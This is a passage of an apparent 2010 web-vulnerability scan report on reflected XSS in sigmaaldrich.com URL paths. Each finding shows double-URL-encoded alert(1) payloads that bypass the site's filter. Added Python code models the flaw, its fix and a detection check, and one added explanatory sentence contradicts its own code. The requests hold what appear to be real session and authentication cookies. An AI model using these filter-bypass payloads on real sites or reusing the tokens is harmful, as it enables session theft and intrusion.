Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/d6952%2522%253balert%25281%2529%252f%252f490a10955c0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/d6952";alert(1)//490a10955c0","E404") ;
   </script>
...[SNIP]...

1.56. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6544%2522%253balert%25281%2529%252f%252f072c5b7bf71 was submitted in the REST URL parameter 1. This input was echoed as b6544";alert(1)//072c5b7bf71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
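
The bypass and the fix described above, as an added Python model that is not Sigma-Aldrich's, IBM's or Burp's code. The blocklist filter is an assumption standing in for whatever check the application really performs (the report only says "certain characters" are blocked), and the page template is reduced to the one cmCreateErrorTag() call the response shows. The vulnerable pipeline filters the once-decoded path, decodes it again and splices the result into the double-quoted JS string; the hardened one decodes once, validates that canonical value, and escapes it for the script context.

```python
"""Model of the double-URL-decode bypass in this report and a hardened rendering.
Added illustration; the BLOCKED set and the reduced template are assumptions."""
from urllib.parse import unquote

# Characters the filter is assumed to reject (the report does not list them).
BLOCKED = set('"\'<>;')

PREFIX = "Error 404 | http://www.sigmaaldrich.com:4402"


def web_server_decode(raw_path: str) -> str:
    """The one decode the web server performs before the application sees the path."""
    return unquote(raw_path)


def blocklist_ok(value: str) -> bool:
    """Assumed filter: rejects the value if any blocked character is present."""
    return not (set(value) & BLOCKED)


def vulnerable_render(raw_path: str):
    """Pipeline the report implies: filter the once-decoded path, decode it a
    second time, then splice the result into a double-quoted JS string.
    Returns the rendered script line, or None if the filter rejected the input."""
    once = web_server_decode(raw_path)
    if not blocklist_ok(once):
        return None
    twice = unquote(once)  # the unnecessary second decode defeats the filter
    return 'cmCreateErrorTag("%s%s","E404") ;' % (PREFIX, twice)


def js_string_escape(value: str) -> str:
    """Escape for a JS string literal inside an HTML <script> block: every
    character outside a small safe set becomes a \\uXXXX escape, so neither a
    quote nor </script> can terminate the context."""
    safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 _-.,:|")
    return "".join(c if c in safe else "\\u%04X" % ord(c) for c in value)


def hardened_render(raw_path: str):
    """Fixed pipeline: decode once, validate the canonical value, and escape
    for the script context before embedding."""
    once = web_server_decode(raw_path)
    if not blocklist_ok(once):  # validation now runs on the canonical value
        return None
    return 'cmCreateErrorTag("%s%s","E404") ;' % (PREFIX, js_string_escape(once))


# The path from issue 1.56 (double-encoded) and its single-encoded form.
DOUBLE = "/chemistryb6544%2522%253balert%25281%2529%252f%252f072c5b7bf71/chemistry-services.html"
SINGLE = "/chemistryb6544%22%3balert%281%29%2f%2f072c5b7bf71/chemistry-services.html"

if __name__ == "__main__":
    print(vulnerable_render(SINGLE))  # None: the filter does catch a single encoding
    print(vulnerable_render(DOUBLE))  # the exact line seen in the report's response
    print(hardened_render(DOUBLE))    # the value stays inside the string literal
```

Running it reproduces the echoed `...b6544";alert(1)//072c5b7bf71...` line from the single-encoded filter bypass, while the hardened version emits `\u0025`, `\u002F` and friends and keeps four quotes in the line (two per literal) instead of five. The escape is the real defence; the blocklist is only kept to show that validation belongs after canonicalisation, not before a further decode.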

Request

GET /chemistryb6544%2522%253balert%25281%2529%252f%252f072c5b7bf71/chemistry-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryb6544";alert(1)//072c5b7bf71/chemistry-services.html","E404") ;
   </script>
...[SNIP]...
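
A check for confirming a finding of this kind from the final response body, added here as example code that is not part of the report or of Burp. It strips JS string literals and `//` comments out of each `<script>` block and reports whether the marker (`alert(1)`) is left in code position, which is exactly what distinguishes the response above from a page that merely contains the marker text. The vulnerable body is reconstructed from the 1.56 response; the "fixed" and text-only bodies are constructed to show the negative cases.

```python
"""Sink-context check: is the reflected marker in JS code position?
Added example; the response bodies below are reconstructed/constructed."""
import re

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def code_only(js: str) -> str:
    """Return the characters of a JS snippet that sit outside '...' / "..."
    string literals and outside // line comments (backslash escapes honoured).
    Template literals, regex literals and /* */ comments are not modelled;
    the cmCreateErrorTag sink uses none of them."""
    out, i, n = [], 0, len(js)
    while i < n:
        c = js[i]
        if c in "\"'":
            quote, i = c, i + 1
            while i < n and js[i] != quote:
                i += 2 if js[i] == "\\" else 1
            i += 1  # skip the closing quote (or run off the end)
        elif js.startswith("//", i):
            nl = js.find("\n", i)
            i = n if nl < 0 else nl  # rest of the line is a comment
        else:
            out.append(c)
            i += 1
    return "".join(out)


def marker_in_code_context(html: str, marker: str = "alert(1)") -> bool:
    """True if any <script> block contains the marker outside a string or
    comment, i.e. the reflected payload would execute rather than sit in a literal."""
    return any(marker in code_only(m.group(1)) for m in SCRIPT_RE.finditer(html))


# Reconstructed from the 404 body in issue 1.56 (only the relevant script block).
VULNERABLE_BODY = """<html><body>
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryb6544";alert(1)//072c5b7bf71/chemistry-services.html","E404") ;
   </script>
</body></html>"""

# Constructed: the same page with the quote and semicolon escaped for the script context.
FIXED_BODY = """<html><body>
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryb6544\\u0022\\u003Balert(1)//072c5b7bf71/chemistry-services.html","E404") ;
   </script>
</body></html>"""

# Constructed: marker reflected into HTML text, not into a script (a different finding).
TEXT_ONLY_BODY = '<html><body><p>Not found: /chemistryb6544";alert(1)//x</p></body></html>'

if __name__ == "__main__":
    for name, body in [("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY), ("text-only", TEXT_ONLY_BODY)]:
        print(name, marker_in_code_context(body))
```

In practice, pass it the body of the response reached after following the redirect the report mentions (for example `requests.get(url, allow_redirects=True).text`), since the echo only appears on the redirected 404 page. Note that the injected `//` also comments out the rest of the original statement, which is why the scanner has to understand line comments to give the right answer.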

1.57. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed was submitted in the REST URL parameter 2. This input was echoed as ca178";alert(1)//cb5ecdfb5ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/ca178";alert(1)//cb5ecdfb5ed","E404") ;
   </script>
...[SNIP]...

1.58. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da was submitted in the REST URL parameter 1. This input was echoed as 7a1df";alert(1)//bbb9e6e45da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da/drug-discovery.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7a1df";alert(1)//bbb9e6e45da/drug-discovery.html","E404") ;
   </script>
...[SNIP]...

1.59. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 was submitted in the REST URL parameter 2. This input was echoed as 80f09";alert(1)//6b5e9380a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 